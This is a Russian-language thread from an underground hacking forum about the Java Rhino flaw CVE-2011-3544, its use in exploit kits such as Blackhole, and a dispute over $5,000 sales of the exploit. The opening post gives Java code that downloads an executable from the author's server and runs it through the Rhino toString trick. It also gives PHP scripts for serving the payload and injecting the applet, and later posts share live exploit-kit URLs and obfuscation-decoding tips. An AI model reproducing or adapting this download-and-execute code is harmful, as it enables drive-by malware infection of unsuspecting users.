• XSS.stack #1 – первый литературный журнал от юзеров форума

Непонятный замут с эксплоитом

Ar3s

Старожил форума
Легенда
Регистрация
30.12.2004
Сообщения
3 357
Реакции
1 404
Сегодняшнее мое повествование пойдет о нашумевшей баге CVE-2011-3544.
Итак, что нам известно:
1. известно что бага позволяет использовать уязвимость для связок эксплоитов и пробивает она на версиях JAVA 1.6.0 - 1.6.28 и Java 7.0 (if((jver[1]==6)&&(jver[3]<=28)&&(jver[3]>23)) если судить по блекхоллу)
2. известно что два человека написали рабочую версию сплоита. Это xlt и КРЫС.
3. известно что ценник на этот сплоит на текущий момент 5К$

За вчерашний вечер мне постучало два человека и оба на одну и ту же тему. Оба говорили о этом сплоите, но первый очень желал его заполучить и попробовать на трафе, а второй решил показать мне эту багу и попросил описать ее суть.
Итак, что же необходимо почитать для понимания о чем идет речь:
Заходим http://schierlm.users.sourceforge.net/CVE-2011-3544.html сюда.
Обращаем внимание на следующие строки:
System.out.println("7 toString returned "+proxy.toString());
While the guys at Sun/Oracle spent quite a lot of time trying to achieve this, they missed (at least) one way, where you can create a script that returns a (Java) object whose toString method will run any script code in the context of the caller of the toString method.
toString: function() {" + " java.lang.System.out.println('4 Doing');" +

вот - строковая функция срабатывает при неявном вызове

Начинаем подготовку к тестам:
На виртуалку качаем java версии 1.6.28 (лично я устанавливал последнюю версию с сайта. Для запуска локально из консоли она подойдет тоже).
Затем устанавливаем JAVA SDK (http://www.oracle.com/technetwork/java/javase/downloads/index.html). Он нам понадобится для работы с нашим модулем.

Для локального запуска нам понадобится прописать pach в системных переменных. Для этого смотрим куда у нас установился java SDK. В папке bin находим javac.exe и создаем ярлык с него на рабочий стол. Открываем свойства ярлыка, и копируем полный путь к файлу.
У меня получился он следующим: C:\Program Files\Java\jdk1.7.0_1\bin
Вписываем глобальную переменную как описано здесь http://clip2net.com/s/1jtOP или по текстовому описанию:
Windows: заходим в свойства моего компьютера(Win+Break) -> Дополнительно -> Переменные среды.
В переменную path через точку с запятой выставляем путь к папке JDK/bin.
Создаем переменную JAVA_HOME и записываем путь к JDK.

Перезагружаемся и открываем cmd
пишем с командной строке javac
Если выдало что программа не найдена или не является системной - значит что-то напутали с глобальной переменной. Вы не там или не так прописали pach.
Если выдало текст от работы программы - значит все сделано верно.


Все готово?
Нет. Нужен сервер с установленным апачем или любым другим вэб-сервером. Нам нужно будет выполнить php-скрипт и выдать наш exe файл.
На сервер заливаем следующий php файл:
Код:
<?php

$file_load = 'cliconfg.exe';
$size = filesize( $file_load );
$fp = fopen( $file_load, "r" );
$source = fread( $fp, $size );
header( "Content-Disposition: inline; filename=".rand( 100000, 900000 ).".exe" );
header( "\r\n" );
header( "Content-Type: application/octet-stream\r\n\r\n" );
echo $source;

?>

Ну и, соответственно, exe-файл с именем cliconfg.exe (можно взять обычный блокнот и залить на сервер с таким именем).
exe и php файлы должны лежать в одной директории, т.к. пути у нас не прописаны и скрипт будет искать экзешник рядом с собой.

У меня получилось вот так:
http://dlab.org.in/java.php
http://dlab.org.in/cliconfg.exe

Теперь перейдем к самому вкусному :)
Создаем папку в любом удобном месте. (я использовал c:\soft)
В ней создаем файлик Main.java
Содержимое файла:
Код:
import java.applet.Applet;
import java.io.*;
import java.net.URL;
import javax.script.*;
public class Main extends Applet
{
public static void main(String[] args) throws Exception
{

for(int i=0;i<10;i++)
{

try
{
String s316="http://dlab.org.in/java.php?f=s";
URL localURL = new URL(s316);
localURL.openConnection();
InputStream localInputStream = localURL.openStream();
String str2=System.getProperty("java.io.tmpdir");
if(str2.charAt(str2.length()-1)!='\\') str2=str2+"\\";
String s474=str2+"cliconfga.exe";
String str3=s474.replace("\\","\\\\\\\\\\\\\\\\");
FileOutputStream localFileOutputStream = new FileOutputStream(str3);
int j=0;
byte[] arrayOfByte=new byte[8192];
while ((j = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
{
localFileOutputStream.write(arrayOfByte, 0, j);
}
localFileOutputStream.close();
localInputStream.close();
ScriptEngine engine=new ScriptEngineManager().getEngineByName("js");
Bindings b=engine.createBindings();
Runnable proxy=(Runnable)engine.eval(
"java.lang.Runnable"+
"({"+
"run:function(){"+
"},"+
"toString:function()"+
"{"+
"java.lang.Runtime.getRuntime().exec('"+str3+"');"+
"}"+
"})",b);
proxy.run();
System.out.println(proxy.toString());

i=10;
return;

}
catch (Exception localException)
{
if(i!=9)
continue;
System.out.println(localException);
}
}
}
}

Как видим, здесь забит мой сервер с php-скриптом который мы создавали ранее.


Если разбираться построчно - то
import java.applet.Applet;
import java.io.*;
import java.net.URL;
Подключаем либы необходимы для работы аплета и работы его в сети.

import javax.script.*; подключение рино


Затем начинается метод и цикл. Зачем цикл?
Все просто, в случае ошибки сети, или перегрузки сервера или неправильного положения звезд на небе мы пробуем выполнить скрипт 10 раз. В случае успеха мы выходим из цикла.(взято из траста)
Далее объявляем удаленный урл и определяем локальный урл для скачивания файла.
Открываем соединение.
String str2=System.getProperty("java.io.tmpdir"); это стандартныая папка темп
int j=0;
byte[] arrayOfByte=new byte[8192];
while ((j = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
{
localFileOutputStream.write(arrayOfByte, 0, j);
}
localFileOutputStream.close();
localInputStream.close();
Это запись получаемого содержимого в массив байт, затем закрытие коннекта.
"java.lang.Runtime.getRuntime().exec('"+str3+"');"+ это запуск
proxy.run();
System.out.println(proxy.toString()); - а это уязвимость, та самая


Итак, пробуем:
Открываем опять коммандную строку cmd
Переходим в папку с нашим Main.java (cd c:\soft\)
Ну и запускаем java -cp . Main

Секунды через 4 мой exe успешно выполнился на локальной машине. :)

----------------------------------------------------------------------------------------------------

А теперь, собственно, сам вопрос: почему blakkat (который показал вышеописанное) желает разжевать суть баги? Говорит, что у него есть вариант для браузера, а это только локальное исполнение. И к тому же, на его тестах, по его словам, сплоит оказался лажей полной.

Тем не менее, в блэкхоле и инкогнито сплоит юзается полным ходом. А EL- утверждает, что сплоит идет там с приличным отрывом от остальных.

В беседе со мной XLT говорит, что вышеописанное - полный бред. И крупицы истины тут нет. А еще нужно юзать вторую багу вкупе с этой что-бы запускать бинарник.

Поэтому на ваше усмотрение предлагается обсудить все вышеописанное и найти все-же золотую середину.

p.s. планировал обзором на главной, но чем дальше я в этой истории пытаюсь разобраться тем более мутные нюансы возникают.
 
Снял сэмпл с Incognito
Код:
if(jav[1]==6 && jav[3]<=28)
Сплоит покрыт обфускатором allatori
Вот то, что нарыл по декоду строк старой версии обфускатора
pass: damagelab

P.S. Говорим о успехах в декоде сплоита! :)
 

Вложения

  • sample.rar
    76.8 КБ · Просмотры: 74
2 GOONER
походу чего-то там не хватает, интересно было бы посмотреть на страничку которая вызывает этот код...
я скачал уязвимую версию "явы", 6.0.25 если быть точным, при запуске файла она меня наругала, мол чего-то не хватает... "акулийплавник" так же не обнаружил сетевой активности... далее решил скормить файл "иде" (с ней я "на вы"), результат был более интересный чем просмотр классов в хекс редакторе, но даже намека на шеллкод я не увидел (ибо не грамотен)... но мне показалось что алгоритм шифрования, ключевая его часть, находится в файле g.class ...

в общем хотелось бы увидить "этого зверя в дикой природе"
 
Перезалил архив-там то, что снял..
И ещё-вчера наткнулся на ту же связку тут
Код:
localhero.ns02.biz/showthread.php?t=47940261
Снимаем, под под разными user-agent'ами, не стесняемся
Декод для Chrome-меняем
Код:
caeib(zztqvmide, hhkxhmhwpe);
на
Код:
console.log(zztqvmide, hhkxhmhwpe);

P.S. Сменили выдачу сплоита
Код:
if((jav[1]==6 && jav[3]<=28)||(jav[1]==7 && jav[3]==0))
Сэмпл в аттаче
pass:damagelab
 

Вложения

  • sample2.rar
    77.1 КБ · Просмотры: 71
Крупица истины есть
Это реализация баги описанной выше в буржуйской ссылке
Просто осуществление неявного вызова экзека
Никто и не утверждал что на вон готовый сплоит и радуйся
ХЛТ может говорить, что хочет, он же решил этим торговать.
А сделать его рабочим не составляет особого труда
Эффект там токо близок к нулю, потому что никто никакую песочницу так и не обходит
Скорее это рекламный трюк
если снять с блекхолла и посмотреть на трафе
то можно увидеть что панч вломил деньги в пустоту, если, конечно, платил
Уязвимость годится только для изучения и поднятия собственного культурного уровня
Да и вообще торговля цвэешками - обычный развод
Ибо по логике вещей буржуйский автор легко мог организовать подобную торговлю
Причем вполне официально, не нарушая законы собственной страны
 
Итак, продолжение истории. собравшись втроем (я, gooner, blackkat), решили проверить сплоит в работе еще раз.
Порывшись на MDL выцепили самый свежий домен с блэк-холе и полезли смотреть внутрь.
venal.philosophony.com/main.php?page=0826a63f7e082987

В выдаче видим следующее:
Код:
if(jver[1]==6&amp;&amp;jver[3]&lt;=28&amp;&amp;jver[3]&gt;23)
{
var f=document.createElement('applet');
f.setAttribute('code', 'v1.class');
f.setAttribute('archive', './content/v1.jar');
var p=document.createElement('param');
p.setAttribute('name','p');
p.setAttribute('value','e00oMDDNh/Q=Voe.=RfRoeR/TVqRmDBVoeoju8bg6h83i');
f.appendChild(p);
document.body.appendChild(f);
}

Скачиваем этот самый ./content/v1.jar
Файлик естественно имеет обфускацию байткода. Ничего не трогаем, ничего не меняем.
К файлику подсовываем два php скрипта:
Код:
<?php

function cryptobe($str)
{
$src_table='aDLXq-_.mjnWN6fwcsKB?xbITS=CykGvd91Z:%ElR5po0rzA8/JYP72#ue&t4iQFhVU3OMgH';
$dest_tabl='QOn7cZAVmK/G4WuBqfLxj1_tlE8PTrpN2Y3:MUa=&5oRi%y?9DHv-Cgwkh60b.FdeSI#zJXs';
$ret='';
for($i=0;$i<strlen($str);$i++)
{
$index=strpos($src_table,$str[$i]);
if($index>-1)
$ret.=$dest_tabl[$index];
}
return $ret;
}

$mmesto="http://".$myip.dirname($_SERVER["PHP_SELF"]);
$loadrhino=cryptobe($mmesto."/d.php?f=s");

$exploitsContent="var f=document.createElement('applet');
f.setAttribute('code','v1.class');
f.setAttribute('archive','v1.jar');
var p=document.createElement('param');
p.setAttribute('name','p');
p.setAttribute('value','".$loadrhino."');
f.appendChild(p);
document.body.appendChild(f);";

$js="<body>
<script>
".$exploitsContent."
</script>
</body>";

echo $js;

?>

Код:
<?php

$file_load = 'notepad.exe';
$size = filesize( $file_load );
$fp = fopen( $file_load, "r" );
$source = fread( $fp, $size );
header( "Content-Disposition: inline; filename=".rand( 100000, 900000 ).".exe" );
header( "\r\n" );
header( "Content-Type: application/octet-stream\r\n\r\n" );
echo $source;

?>

Теперь добавлю немного нашей переписки:
[21:02:35] <Ar3s> 6,18 там если не ошибаюсь
[21:02:54] <blackkat> jver[3]>23
[21:02:55] <Ar3s> 1212.ind.in/rino/jre.exe
[21:03:36] <Ar3s> так какая версия нужна?
[21:04:03] <blackkat> if(jver[1]==6&amp;&amp;jver[3]&lt;=28&amp;&amp;jver[3]&gt;23)
[21:04:15] <blackkat> 6.25
[21:04:26] <blackkat> 6.28
[21:04:31] <Ar3s> JAVA 1.6.0 - 1.6.28
[21:04:39] <blackkat> точно
[21:04:48] <Ar3s> 1.6.18 должно пробивать
[21:05:10] <blackkat> ну если пробьет
[21:05:19] <blackkat> будем мою тестить
[21:14:26] <blackkat> ну чо
[21:14:30] <blackkat> получается?
[21:15:48] <Ar3s> blackkat: vpn медленный. сливается еiiо
[21:15:54] <Ar3s> ешшо*
[21:18:38] <Ar3s> gooner: ты пробовал уже?
[21:18:52] <gooner> нужно добавить $myip=$_SERVER['SERVER_ADDR'];
[21:19:08] <gooner> у мну не сработало
[21:20:12] <blackkat> да добавь
[21:20:32] <blackkat> за был дописать это
[21:20:45] <gooner> угу
[21:21:21] <blackkat> погоди..
[21:21:28] <blackkat> надо линк проверить
[21:21:33] <blackkat> вначале
[21:31:01] <blackkat> линк нормальный получается
[21:32:17] <blackkat> не пашет у меня тоже
[21:32:22] <blackkat> на 6,25
[21:32:23] <gooner> ну вот
[21:32:33] <gooner> у мну 6,18
[21:32:51] <blackkat> значит фейк
[21:32:54] <blackkat> но..
[21:34:54] <gooner> глянуть бы  скрин статы blackhole
[21:35:12] <blackkat> возможно чтоб все это срабатывало нужно чтоб был установлен пакет разработчика jdk
[21:35:37] <gooner> Ыы тогда толку с сплоита будет оч. мало
[21:35:52] <blackkat> панч чо дурак признаваться в том что он в лажу пять тонн ввалил
[21:36:03] <blackkat> вот и я про то же
[21:36:16] <blackkat> подрисует
[21:36:21] <blackkat> и все дела
[21:36:30] <blackkat> надо с инкогнито пообщаться
[21:36:40] <Ar3s> blackkat: тогда отстук резко упадет.... Там покупатели тоже не все лохи педальные.
[21:36:47] <blackkat> неа
[21:36:57] <blackkat> заметь как идет вызов
[21:37:06] <blackkat> помимо траста
[21:37:29] <blackkat> часть трастовой выручки в стате рисуешь этому рино и все дела
[21:37:47] <blackkat> чот не слышно было чтоб там пробив поднялся

[21:46:27] <gooner> так ты просто разобрал обе и увидел там строки для декода?
[21:47:43] <blackkat> конечно
[21:47:57] <blackkat> чо за час разберешь эту хрень что ли
[21:48:05] <gooner> :)
[21:48:24] <gooner> я думал ты снял обфускацию байткода
[21:48:32] <blackkat> а нафига
[21:48:41] <blackkat> код сплоита простой
[21:48:51] <blackkat> строчки из другого взял
[21:48:53] <gooner> возможно в сплоите стоит защита?скажем длина строки?
[21:48:56] <blackkat> и все дела
[21:49:14] <Ar3s> blackkat: gooner может быть прав.
[21:49:15] <blackkat> надо проверить
[21:49:17] <gooner> нужно попробовать
[21:49:21] <gooner> угу
[21:49:54] <blackkat> добить этими &&&&&
[21:51:04] <Ar3s> а вам не кажется что слишком легко как-то он нам достался этот сэмпл?
[21:52:55] <gooner> у мну по длине строки-всё тот же результат
[21:56:00] <gooner> нет сэмпл не проблема- я снимал толи с инкогнито, толи с связки от пуэрто-всё также палилось на трекере
[21:56:19] <Ar3s> а крипт?
[21:56:39] <Ar3s> аллатори.
[21:57:10] <gooner> так и тут обфускация байткода присутствует
[21:57:58] <Ar3s> чет я запустался. jar сдесь чем покрыт?
[21:58:09] <gooner> да
[21:58:24] <gooner> присутствует обфускация байткода
[21:58:42] <gooner> только на те сэмплы, что я ранее снял не похоже
[21:58:56] <blackkat> из-за этого он плохо декомпилится
[21:59:12] <gooner> видимо хлт продал сорцы пончу, он сделал билд, но параметр (линк на скачку ехе) он не криптовал
[21:59:49] <gooner> в тех сэмплах, что снял я-линк криптовался
[22:00:23] <gooner> тем хитрым обфускатором
[22:01:24] <gooner> http://krebsonsecurity[.]com/2011/11/new-jav...o-exploit-kits/
[22:01:50] <gooner> вот уже аналитики трубят о рино
[22:02:05] <gooner> там и видео с работой сплоита
[22:02:39] <Ar3s> если аналитики трубят значит воркает?
[22:03:56] <gooner> нет значит получили инфо о продаже ну и видео от хлт
[22:05:17] <Ar3s> думаешь сговор связко-держателей? разрекламили новый сплоит-пустышку. Нарисовали статы и получили бабки за апгрэйд?
[22:06:33] <Ar3s> gooner: это не то видео что на эксплоите лежит?
[22:07:03] <gooner> по ходу то видео
[22:07:17] <blackkat> блин это кино от хлт
[22:07:26] <gooner> угу
[22:07:48] <blackkat> вот надо убедиться так это или не так
[22:08:02] <gooner> я просто не пойму-почему тогда есть CVE  и кое-какое инфо о сплоите
[22:08:29] <gooner> и почему у аверов есть сиги на сплоит
[22:10:48] <Ar3s> не факт что они его декомпилировали. Тупо сэмпл от греха подальше положили в сиги и все.
[22:13:16] <gooner> м.б.
[22:14:24] <gooner> наверное потом регнусь на буржуйском форуме (тот, где сняли аллатори старой версии) и попрошу помощи в снятии новой версии :)

Ну и собственно остается добавить, для тех кто не любит долго читать, что указанный сплоит на сработал ни у одного из нас. Либо мы неправильно его выдаем, либо blackkat прав и сплоит реально пустышка для фиктивного апдэйта.

Поэтому всем, кто может подсказать свои идеи о его "правильном" запуске - просьба отписаться в топе.

p.s. В данный момент все лежит по адресу: 21212.ind.in/rhino/index.php
21212.ind.in/rhino/jre.exe (это версия java 6,18)
Если вдруг у кого-нить оно сработает - дайте знать.
Ну и интересно знать что вы об этом думаете.
 
блеккат ты неадекват и лох санный))))) не смог сделать рабочий эксп и утверждаешь, что продавалась пустышка... как раз в реал экспе обходится песочница... просто вы имея даже рабочий семпл не смогли его запустить, что говорит о вашей безграмотности... вот на метасплоите реально обходится песочница, как у меня и у крыса в экспе...
иди учи матчать)
Мне Ar3s сразу написал, и скинул код твоей дешевой подделки, где даже не было намека на повышение привилегий JAVA и отключение SecurityManager, я сразу ему ответил, что там даже намека на эксп нету! Что не все так просто и это просто код который показывает, как работает движок Rhino!))))))))

Насчет бурж автора, который запостил эксп на продажу на ZDI. То после начала продажи он ко мне написал в джаббер. Сказал, что ко мне претензий не имеет. Говорит ему скинули скриншоты с закрытых форумов и эксплоита с темой о продаже, и просили выложить эксп в паблик. Он сказал им, что не выложит. Спросил у меня, где выгоднее экспы продавать т.к он вайтхек и на хек форумах не сидит.
 
ХЛТ, а чо ты, собственно, развонялся?
Все это было в привате, в самом начале статьи просто демонстрация уязвимости, твой сплоит не разбирался, так что тебе никто не мешал барыжить.
Какие могут быть претензии?
 
Итак, что нам известно:
1. известно что бага позволяет использовать уязвимость для связок эксплоитов и пробивает она на версиях JAVA 1.6.0 - 1.6.28 и Java 7.0 (if((jver[1]==6)&&(jver[3]<=28)&&(jver[3]>23)) если судить по блекхоллу)
2. известно что два человека написали рабочую версию сплоита. Это xlt и КРЫС.
3. известно что ценник на этот сплоит на текущий момент 5К$


Насколько я знаю, до этих ребят рабочий сплоит сделал автор faust sys пака... Он об этом вроде писал в топе продажи за 5к (интересно многие купили? :D ) И думаю другие грамотные люди тоже сделали кому надо было, т.к. в статье того буржуя все описано, нужно только знать англ. и иметь какие-то познания в яве\рхино Также есть некоторые нюансы насчет стабильной работы этого сплоита, о которых здесь не писали.
 
Brainy например сегодня один человек в личной беседе с нашим модером написал следующие строки:
[19:45:52] <user> унас сплойт там новый стоит
[19:45:54] <moder> если можно-хотелось бы увидить стату (чисто проф интерес)
[19:45:55] <user> у панча брали
[19:45:58] <moder> да рино
[19:46:18] <moder> он уже в паблике
[19:46:41] <user> мы за него 5к отдали панчу))
[19:46:46] <moder> =)))))))

Думаю это будет ответом на ваш фопрос.
 
Я бы не сказал, что faust sys раньше написал. Багу в паблик выложили 24 октября, у меня на написание и отладку ушло где-то 6 дней. У крыса примерно столько же по времени заняло написание. Тема о продаже в паблике не сразу появилась, сначала в привате была продажа, и топ на иностраном закрытом ресурсе. Мне кажется faust sys купил эксп у крыса. Ну да описание в паблике подробное, но без знания JAVA и не смотря исходники движка RHINO эксп не напишешь.
 
Brainy например сегодня один человек в личной беседе с нашим модером написал следующие строки:
Цитата|Quote
[19:45:52] <user> унас сплойт там новый стоит
[19:45:54] <moder> если можно-хотелось бы увидить стату (чисто проф интерес)
[19:45:55] <user> у панча брали
[19:45:58] <moder> да рино
[19:46:18] <moder> он уже в паблике
[19:46:41] <user> мы за него 5к отдали панчу))
[19:46:46] <moder> =)))))))


Думаю это будет ответом на ваш фопрос.
Чтобы такого не было надо было сразу покупать, у меня или крыса. Кстати пацаны реально лохонулись, первые 2 недели эксп имел очень хороший пробив. Потом большая часть людей обновила JAVA и пробив упал в полтора -два раза. После этого я закрыл продажу. Притом еще купили за 5к, когда он ценности уже не представлял и в паблике вышел.

*** 2011-12-01
[22:25:54] *** paunch@thesecure.at - Доступен [http://crypt.im - сервис крипта ифрейма и javascript]
[22:25:57] <xlt> [19:45:52] <user> унас сплойт там новый стоит
[19:45:54] <moder> если можно-хотелось бы увидить стату (чисто проф интерес)
[19:45:55] <user> у панча брали
[19:45:58] <moder> да рино
[19:46:18] <moder> он уже в паблике
[19:46:41] <user> мы за него 5к отдали панчу))
[19:46:46] <moder> =)))))))
[22:26:09] <xlt> https://xss.pro/index.php?topic=22399.0
[22:26:30] <xlt> ну ты молодец у меня исходник купил, и сам еще в придачу барыжил людям...
[22:28:28] <paunch@thesecure.at> привет
[22:28:29] <paunch@thesecure.at> в смысле ?
[22:28:40] <paunch@thesecure.at> почему барыжил ?
[22:28:46] <paunch@thesecure.at> предоставлял его за доплату
[22:28:55] <xlt> за 5к?))))))
[22:29:03] <paunch@thesecure.at> а зачем он мне самому то нужен если я не работаю с трафом
[22:29:10] <paunch@thesecure.at> что бы не дешевле чем у тебя это было
[22:29:22] <paunch@thesecure.at> если бы делал за дешевле тебе бы это понравилось ?
[22:30:42] <xlt> :))) мне честно похуй, ты обьясни человеку, что ты ему эксп который в паблике на метасплоите продал)))))
[22:31:13] <paunch@thesecure.at> я продал ему его когда он в привате был
[22:31:17] <xlt> ну с твоей стороны было не хорошо, что ты еще просил скидки, что у тебя никто некупит... а сам за 5к продавал...
[22:31:56] <xlt> и за 5к ты ему продал исходник, а не сам эксп...
[22:32:09] <paunch@thesecure.at> какой нафиг исходник ?
[22:32:15] <paunch@thesecure.at> я исходник никому не прадал ниразу
 
иди учи матчать)
Мне Ar3s сразу написал, и скинул код твоей дешевой подделки, где даже не было намека на повышение привилегий JAVA и отключение SecurityManager, я сразу ему ответил, что там даже намека на эксп нету! Что не все так просто и это просто код который показывает, как работает движок Rhino!))))))))
По пунктам:
1) Это не подделка, а пример того, как в рино строковую функцию можно сделать исполняемой командой, тем самым введя в заблуждение некоторые защитные механизмы системы.
2) В твоей поделке для лохов v1.jar за пять тонн баксов функция скачки экзэ с удаленного ресурса вынесена за пределы риновской конструкции, поэтому то твой лажовый сплоит и не работает, в чем легко можно убедиться, просто посмотрев на структуру класса.
Запуск экзэ - естественно, внутри. Вот он то и работает, запуская экзэ, который УЖЕ находится на машине. Отсюда получилось видео и понеслись реплики типа "только я и Крыс". Крысовский сплоит не видел, может он и реализовал загрузку, поди знай.
А вот ты этот сплоит не удосужился доделать даже.
И нечего на панча валить.
Он продавал то, что ему всучили под видом годного товара.
И делал это так, как умеет, не кидаясь высокими фразами.
3) Про System.setSecurityManager(null) знает любой студэнт, если он, конечно, не в торговом ПТУ учится.
Впрочем, перед свиньями бисер не мечут, ты и половину, наверняка, не понял.
Удачи, барыга!
 
Если честно, то не рассматривал приведенные на первых страницах файлы, но сама идея обфускации, которую так упорно пытались снять, - бред. Вы же не думаете, что посетителю перед эксплуатацией будет предложено установить к себе дополнительное ПО, чтобы эксплоиты у него корректно срабатывали? Соответственно используются стандартные обратимые алгоритмы, и все ключи, если таковые имеются, передаются в открытом виде.

Возможно, я что-то неправильно понял, но в чем была сложность поставить VBox + уязвимую версию Java-машины, отключить Acrobat и Flash и воспользоваться какой-нибудь ссылкой на BH из MDL? Если эксплуатация действительно есть, то она бы достаточно просто выявлялась. И не пришлось бы гадать, есть ли там проверка длины или тому подобное. По поводу компетентности все-таки точка зрения Xlt мне как-то ближе.

Если посмотреть с другой стороны, то достаточное количество раз мне приходилось слышать такое мнение(причем неоднократно и от разных пользователей), что Xlt, Paunch и KPblC - один и тот же человек. Ни разу не слышал, чтобы кто-то говорил о всех троих одновременно, например, не было речи, что Paunch и KPblC как-то связаны. Но на соседнем ресурсе высказывалось мнение о подобной связи как про Xlt и Paunch, так и про Xlt и KPblC. Я думаю, что не единственный, кто сталкивался с этой информацией. Лично я с подобными высказываниями согласен, и это не безосновательно: если прочитать сообщения Xlt на exploit.in, то выводы напрашиваются сами.
Я это все к тому, что продвигаемый с вышеупомянутых профилей эксплоит(речь идет не о том, что сейчас есть на любом bug-трэкере, а о эксплоите, который изначально продавался), судя по данному топику, заработал как раз только у них. Мне, конечно, особой разницы нет, если у кого-то есть желание, то пусть хоть сотню профилей себе регистрирует, я-то все равно работаю только с ограниченным кругом проверенных людей, но странно, что никто в данном топике не вспомнил про эту пусть и не самую достоверную, но достаточно интересную информацию.

Предполагая заранее появление в будущем ответа от вышеупомянутого пользователя, замечу для Xlt, что, во-первых, этот ответ никак не повлияет на мою точку зрения, во-вторых, в ближайшие месяц-два я вряд ли зайду на данных форум, не говоря уже о том, что к тому времени я уже забуду про существование этого топика, в-третьих, все равно привести каких-то доводов, подтверждающих на все 100% несостоятельность подобной идеи, у вас не получится.

Удачи всем пользователям DL.
 
По пунктам:
1) Это не подделка, а пример того, как в рино строковую функцию можно сделать исполняемой командой, тем самым введя в заблуждение некоторые защитные механизмы системы.
2) В твоей поделке для лохов v1.jar за пять тонн баксов функция скачки экзэ с удаленного ресурса вынесена за пределы риновской конструкции, поэтому то твой лажовый сплоит и не работает, в чем легко можно убедиться, просто посмотрев на структуру класса.
Запуск экзэ - естественно, внутри. Вот он то и работает, запуская экзэ, который УЖЕ находится на машине. Отсюда получилось видео и понеслись реплики типа "только я и Крыс". Крысовский сплоит не видел, может он и реализовал загрузку, поди знай.
А вот ты этот сплоит не удосужился доделать даже.
И нечего на панча валить.
Он продавал то, что ему всучили под видом годного товара.
И делал это так, как умеет, не кидаясь высокими фразами.
3) Про System.setSecurityManager(null) знает любой студэнт, если он, конечно, не в торговом ПТУ учится.
Впрочем, перед свиньями бисер не мечут, ты и половину, наверняка, не понял.
Удачи, барыга!
Так у меня рабочая версия экспа и её несколько людей купило, никто не жаловался))))))) Выше сказанным ты еще раз доказал, что ты неадекват!)))))))))))
Я по сравнению со всеми вами могу стек вызова рассказать и где именно в коде rhino происходит ошибка и какие есть особенности))))
У вас не работало или вы не правильно сняли байткод и не правильно восстановили исходник, что сделать очень и очень сложно, или ключи шифрования для URL у вас были не правильны. Учи матчасть школяр!)
 
Думаю это будет ответом на ваш фопрос.

просто мне показалось, что 5к много для такого сплоита, где-то 3к было бы норм.. Но сейчас пофиг на это


1) Это не подделка, а пример того, как в рино строковую функцию можно сделать исполняемой командой, тем самым введя в заблуждение некоторые защитные механизмы системы.
2) В твоей поделке для лохов v1.jar за пять тонн баксов функция скачки экзэ с удаленного ресурса вынесена за пределы риновской конструкции, поэтому то твой лажовый сплоит и не работает, в чем легко можно убедиться, просто посмотрев на структуру класса.
Запуск экзэ - естественно, внутри. Вот он то и работает, запуская экзэ, который УЖЕ находится на машине. Отсюда получилось видео и понеслись реплики типа "только я и Крыс". Крысовский сплоит не видел, может он и реализовал загрузку, поди знай.
А вот ты этот сплоит не удосужился доделать даже.
И нечего на панча валить.
Он продавал то, что ему всучили под видом годного товара.
И делал это так, как умеет, не кидаясь высокими фразами.
3) Про System.setSecurityManager(null) знает любой студэнт, если он, конечно, не в торговом ПТУ учится.

ересь :D

xlt прав.
 
Brainy, первые две недели эта цена была адекватная т.к эксп тогда имел пробив в 1.5-2 раза выше, и кто купил с него хороший профит поимел, а потом пробив резко спал и 5к за него отдавать не было смысла.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх